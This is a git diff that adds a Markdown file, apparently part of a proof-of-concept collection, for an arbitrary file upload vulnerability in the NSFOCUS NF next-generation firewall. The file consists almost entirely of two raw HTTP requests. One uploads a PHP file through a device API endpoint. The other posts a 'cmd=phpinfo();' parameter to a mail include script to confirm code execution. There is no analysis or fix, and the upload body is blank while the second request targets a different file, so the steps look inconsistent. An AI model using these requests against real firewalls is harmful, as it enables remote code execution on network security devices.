diff --git a/绿盟 NF 下一代防火墙 任意文件上传漏洞.md b/绿盟 NF 下一代防火墙 任意文件上传漏洞.md new file mode 100644 index 0000000..7dad7d0 --- /dev/null +++ b/绿盟 NF 下一代防火墙 任意文件上传漏洞.md @@ -0,0 +1,15 @@ +## 绿盟 NF 下一代防火墙 任意文件上传漏洞 +``` +POST /api/v1/device/bugsInfo HTTP/1.1 +Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef +Host: +--4803b59d015026999b45993b1245f0ef +Content-Disposition: form-data; name="file"; filename="compose.php" + +--4803b59d015026999b45993b1245f0ef-- +POST /mail/include/header_main.php HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71 +Host: +cmd=phpinfo(); +```